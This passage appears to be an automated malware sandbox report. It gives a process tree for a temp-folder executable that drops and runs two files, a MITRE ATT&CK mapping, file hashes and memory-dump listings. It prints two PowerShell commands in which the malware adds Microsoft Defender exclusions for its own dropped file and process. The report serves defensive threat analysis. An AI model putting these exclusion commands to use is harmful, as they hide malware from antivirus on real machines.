- Suspicious use of AdjustPrivilegeToken
PID:2600

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2608

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:1044

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:792

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3316
- C:\Users\Admin\AppData\Local\Temp\Iinpdftw.exe
  "C:\Users\Admin\AppData\Local\Temp\Iinpdftw.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4792
- - C:\Users\Admin\AppData\Local\Temp\$77e1f23e
    "C:\Users\Admin\AppData\Local\Temp\$77e1f23e"
    3⤵
    - Executes dropped EXE
    PID:2752
- - C:\Users\Admin\AppData\Local\Temp\$77f99bf3
    "C:\Users\Admin\AppData\Local\Temp\$77f99bf3"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:5072
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\$77f99bf3'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:652
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:1172
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77f99bf3'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4500
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:968

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3444

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:3476

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3824

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3952

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3976

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
1⤵
PID:4024

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:4200

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
1⤵
PID:4416

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:3576

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:1192

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:2492

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:3936

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:1524

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:400

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:4812

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:1588

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4760

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:1996

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Enumerates system info in registry
PID:5024

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
ac4917a885cf6050b1a483e4bc4d2ea5

SHA1
b1c0a9f27bd21c6bbb8e9be70db8777b4a2a640f

SHA256
e39062a62c3c7617feeeff95ea8a0be51104a0d36f46e44eea22556fda74d8d9

SHA512
092c67a3ecae1d187cad72a8ea1ea37cb78a0cf79c2cd7fb88953e5990669a2e871267015762fd46d274badb88ac0c1d73b00f1df7394d89bed48a3a45c2ba3d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
d9a87334a1d8ba2357dcd483f46619d6

SHA1
ddedc337ae9948626e725c6ea6c2e1f37e770442

SHA256
0afd2c42ab9b82150495423c6b72322d60a2f506fa0bb814f7e8a57bbd5a4f4c

SHA512
cfad686e601926235d64d9188bcf1468ce1500f909c7132580f958e16eaf3615adcc6f12e97520c5735f8a994a7e08c06204898b0da414fafb557065f44af42c

Download Submit
C:\Users\Admin\AppData\Local\Temp\$77e1f23e

Filesize
4.7MB

MD5
a9cb0e951c7ede7c23b5ba350b4920fd

SHA1
a16b2377a77e86b2a2cd27d58c44218e8aaa1a66

SHA256
0b75189b6f3d6e031159d20e351d60f6dd8956642e16d55083936096f73eb864

SHA512
300111595b2ea4fc3143b25faca8f97e27286221456c792f5ea80b3fe066baf5d1d2fcca122ebe17362ea3f26fdb06388356be122389229745972bb6d0b6fad4

Download Submit
C:\Windows\Temp\__PSScriptPolicyTest_x2b2wwkr.dao.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/652-5671-0x0000000070010000-0x000000007005C000-memory.dmp

Filesize
304KB

Download
memory/652-5668-0x00000000066E0000-0x00000000066FE000-memory.dmp

Filesize
120KB

Download
memory/652-5689-0x0000000008240000-0x000000000825A000-memory.dmp

Filesize
104KB

Download
memory/652-5688-0x0000000008130000-0x0000000008145000-memory.dmp

Filesize
84KB

Download
memory/652-5687-0x0000000008120000-0x000000000812E000-memory.dmp

Filesize
56KB

Download
memory/652-5686-0x00000000080F0000-0x0000000008101000-memory.dmp

Filesize
68KB

Download
memory/652-5685-0x0000000008180000-0x0000000008216000-memory.dmp

Filesize
600KB

Download
memory/652-5684-0x0000000007F50000-0x0000000007F5A000-memory.dmp

Filesize
40KB

Download
memory/652-5683-0x0000000007EE0000-0x0000000007EFA000-memory.dmp

Filesize
104KB

Download
memory/652-5682-0x0000000008530000-0x0000000008BAA000-memory.dmp

Filesize
6.5MB

Download
memory/652-5681-0x0000000007920000-0x00000000079C4000-memory.dmp

Filesize
656KB

Download
memory/652-5680-0x0000000007900000-0x000000000791E000-memory.dmp

Filesize
120KB

Download
memory/652-5655-0x0000000001340000-0x0000000001376000-memory.dmp

Filesize
216KB

Download
memory/652-5670-0x00000000076C0000-0x00000000076F4000-memory.dmp

Filesize
208KB

Download
memory/652-5669-0x00000000069D0000-0x0000000006A1C000-memory.dmp

Filesize
304KB

Download
memory/652-5690-0x0000000008220000-0x0000000008228000-memory.dmp

Filesize
32KB

Download
memory/652-5667-0x00000000062D0000-0x0000000006627000-memory.dmp

Filesize
3.3MB

Download
memory/652-5658-0x00000000059D0000-0x0000000005A36000-memory.dmp

Filesize
408KB

Download
memory/652-5657-0x0000000005930000-0x0000000005952000-memory.dmp

Filesize
136KB

Download
memory/652-5656-0x0000000005CA0000-0x00000000062CA000-memory.dmp

Filesize
6.2MB

Download
memory/2752-4902-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/2916-5154-0x00007FFF96EB0000-0x00007FFF97972000-memory.dmp

Filesize
10.8MB

Download
memory/2916-4919-0x00007FFF96EB0000-0x00007FFF97972000-memory.dmp

Filesize
10.8MB

Download
memory/2916-4918-0x00007FFF96EB0000-0x00007FFF97972000-memory.dmp

Filesize
10.8MB

Download
memory/2916-4914-0x0000021EE29C0000-0x0000021EE29EA000-memory.dmp

Filesize
168KB

Download
memory/2916-4913-0x00007FFF96EB0000-0x00007FFF97972000-memory.dmp

Filesize
10.8MB

Download
memory/2916-4912-0x00007FFF96EB3000-0x00007FFF96EB5000-memory.dmp

Filesize
8KB

Download
memory/2916-4905-0x0000021EE2610000-0x0000021EE2632000-memory.dmp

Filesize
136KB

Download
memory/4500-5726-0x0000000005E20000-0x0000000006177000-memory.dmp

Filesize
3.3MB

Download
memory/4500-5728-0x0000000070010000-0x000000007005C000-memory.dmp

Filesize
304KB

Download
memory/4792-46-0x0000000006540000-0x000000000677F000-memory.dmp

Filesize
2.2MB

Download
memory/4792-34-0x0000000006540000-0x000000000677F000-memory.dmp

Filesize
2.2MB

Download
memory/4792-6-0x0000000006540000-0x000000000677F000-memory.dmp

Filesize
2.2MB

Download
memory/4792-5-0x0000000006540000-0x000000000677F000-memory.dmp

Filesize
2.2MB

Download
memory/4792-4891-0x0000000074FC0000-0x0000000075771000-memory.dmp

Filesize
7.7MB

Download
memory/4792-4892-0x00000000055A0000-0x0000000005622000-memory.dmp

Filesize
520KB

Download
memory/4792-4893-0x0000000005620000-0x000000000566C000-memory.dmp

Filesize
304KB

Download
memory/4792-10-0x0000000006540000-0x000000000677F000-memory.dmp

Filesize
2.2MB

Download
memory/4792-12-0x0000000006540000-0x000000000677F000-memory.dmp

Filesize
2.2MB

Download
memory/4792-15-0x0000000006540000-0x000000000677F000-memory.dmp

Filesize
2.2MB

Download
memory/4792-18-0x0000000006540000-0x000000000677F000-memory.dmp

Filesize
2.2MB

Download
memory/4792-4901-0x0000000074FCE000-0x0000000074FCF000-memory.dmp

Filesize
4KB

Download
memory/4792-20-0x0000000006540000-0x000000000677F000-memory.dmp

Filesize
2.2MB

Download
memory/4792-24-0x0000000006540000-0x000000000677F000-memory.dmp

Filesize
2.2MB

Download
memory/4792-26-0x0000000006540000-0x000000000677F000-memory.dmp

Filesize
2.2MB

Download
memory/4792-28-0x0000000006540000-0x000000000677F000-memory.dmp

Filesize
2.2MB

Download
memory/4792-30-0x0000000006540000-0x000000000677F000-memory.dmp

Filesize
2.2MB

Download
memory/4792-32-0x0000000006540000-0x000000000677F000-memory.dmp

Filesize
2.2MB

Download
memory/4792-5586-0x0000000005950000-0x00000000059A4000-memory.dmp

Filesize
336KB

Download
memory/4792-5613-0x0000000074FC0000-0x0000000075771000-memory.dmp

Filesize
7.7MB

Download
memory/4792-1-0x0000000000500000-0x00000000009B8000-memory.dmp

Filesize
4.7MB

Download
memory/4792-2-0x0000000006540000-0x0000000006786000-memory.dmp

Filesize
2.3MB

Download
memory/4792-3-0x0000000006D30000-0x00000000072D6000-memory.dmp

Filesize
5.6MB

Download
memory/4792-22-0x0000000006540000-0x000000000677F000-memory.dmp

Filesize
2.2MB

Download
memory/4792-38-0x0000000006540000-0x000000000677F000-memory.dmp

Filesize
2.2MB

Download
memory/4792-42-0x0000000006540000-0x000000000677F000-memory.dmp

Filesize
2.2MB

Download
memory/4792-44-0x0000000006540000-0x000000000677F000-memory.dmp

Filesize
2.2MB

Download
memory/4792-0-0x0000000074FCE000-0x0000000074FCF000-memory.dmp

Filesize
4KB

Download
memory/4792-48-0x0000000006540000-0x000000000677F000-memory.dmp

Filesize
2.2MB

Download
memory/4792-50-0x0000000006540000-0x000000000677F000-memory.dmp

Filesize
2.2MB

Download
memory/4792-52-0x0000000006540000-0x000000000677F000-memory.dmp

Filesize
2.2MB

Download
memory/4792-56-0x0000000006540000-0x000000000677F000-memory.dmp

Filesize
2.2MB

Download
memory/4792-58-0x0000000006540000-0x000000000677F000-memory.dmp

Filesize
2.2MB

Download
memory/4792-60-0x0000000006540000-0x000000000677F000-memory.dmp

Filesize
2.2MB

Download
memory/4792-62-0x0000000006540000-0x000000000677F000-memory.dmp

Filesize
2.2MB

Download
memory/4792-66-0x0000000006540000-0x000000000677F000-memory.dmp

Filesize
2.2MB

Download
memory/4792-68-0x0000000006540000-0x000000000677F000-memory.dmp

Filesize
2.2MB

Download
memory/4792-64-0x0000000006540000-0x000000000677F000-memory.dmp

Filesize
2.2MB

Download
memory/4792-54-0x0000000006540000-0x000000000677F000-memory.dmp

Filesize
2.2MB

Download
memory/4792-40-0x0000000006540000-0x000000000677F000-memory.dmp

Filesize
2.2MB

Download
memory/4792-36-0x0000000006540000-0x000000000677F000-memory.dmp

Filesize
2.2MB

Download
memory/4792-16-0x0000000006540000-0x000000000677F000-memory.dmp

Filesize
2.2MB

Download
memory/4792-8-0x0000000006540000-0x000000000677F000-memory.dmp

Filesize
2.2MB

Download
memory/4792-4-0x0000000006820000-0x00000000068B2000-memory.dmp

Filesize
584KB

Download
memory/5072-5616-0x0000000005E10000-0x0000000005E76000-memory.dmp

Filesize
408KB

Download
memory/5072-5615-0x0000000003C50000-0x0000000003CEC000-memory.dmp

Filesize
624KB

Download
memory/5072-5614-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download